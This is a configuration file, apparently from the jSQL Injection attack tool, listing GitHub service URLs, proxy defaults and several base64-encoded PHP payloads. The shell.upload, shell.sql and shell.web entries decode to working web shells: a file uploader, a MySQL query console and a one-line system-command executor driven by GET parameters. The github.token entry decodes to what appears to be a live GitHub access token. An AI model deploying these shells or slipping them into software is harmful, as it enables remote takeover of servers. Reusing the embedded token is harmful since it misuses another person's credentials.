jsql.version = 0.85

github.webservice.url = https://raw.githubusercontent.com/ron190/jsql-injection/master/web/services/jsql-injection.json

github.webservice.i18n.root = https://raw.githubusercontent.com/ron190/jsql-injection/master/model/src/main/resources/i18n/jsql.properties
github.webservice.i18n.locale = https://raw.githubusercontent.com/ron190/jsql-injection/master/model/src/main/resources/i18n/

github.issues.url = https://api.github.com/repos/ron190/jsql-injection/issues

github.url = https://github.com/ron190/jsql-injection

github.token = Z2hwX1lPSkEwUWNDNFlDVTRMTjBvOVlRdUg3cktwNDRSZDFKelRNMg==

shell.upload = PD9waHAgZWNobyBtb3ZlX3VwbG9hZGVkX2ZpbGUoJF9GSUxFU1sndSddWyd0bXBfbmFtZSddLCBnZXRjd2QoKS4nLycuYmFzZW5hbWUoJF9GSUxFU1sndSddWyduYW1lJ10pKT8nJHtzaGVsbC5sZWFkfXknOiduJzsgPz4=

shell.sql = PCR7c2hlbGwubGVhZH0+PD9waHAgbXlzcWxfY29ubmVjdCgnbG9jYWxob3N0JywkX0dFVFsndSddLCRfR0VUWydwJ10pOyRyZXN1bHQ9bXlzcWxfcXVlcnkoJHI9JF9HRVRbJ3EnXSlvciBkaWUoJzxTUUxlPlF1ZXJ5IGZhaWxlZDogJy5teXNxbF9lcnJvcigpLic8JHtzaGVsbC50cmFpbH0+Jyk7aWYoaXNfcmVzb3VyY2UoJHJlc3VsdCkpe2VjaG8nPFNRTHI+Jzt3aGlsZSgkcm93PW15c3FsX2ZldGNoX2FycmF5KCRyZXN1bHQsTVlTUUxfTlVNKSllY2hvJzx0cj48dGQ+Jyxqb2luKCc8L3RkPjx0ZD4nLCRyb3cpLCc8L3RkPjwvdHI+Jzt9ZWxzZSBpZigkcmVzdWx0PT1UUlVFKWVjaG8nPFNRTG0+UXVlcnkgT0s6ICcsbXlzcWxfYWZmZWN0ZWRfcm93cygpLCcgcm93KHMpIGFmZmVjdGVkJztlbHNlIGlmKCRyZXN1bHQ9PUZBTFNFKWVjaG8nPFNRTG0+UXVlcnkgZmFpbGVkJzs/Pjwke3NoZWxsLnRyYWlsfT4=
            
shell.web = PCR7c2hlbGwubGVhZH0+PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pOyA/Pjwke3NoZWxsLnRyYWlsfT4=

http.proxy.default.ip = 127.0.0.1
http.proxy.default.port = 8118
https.proxy.default.ip = 127.0.0.1
https.proxy.default.port = 8118

shell.system = 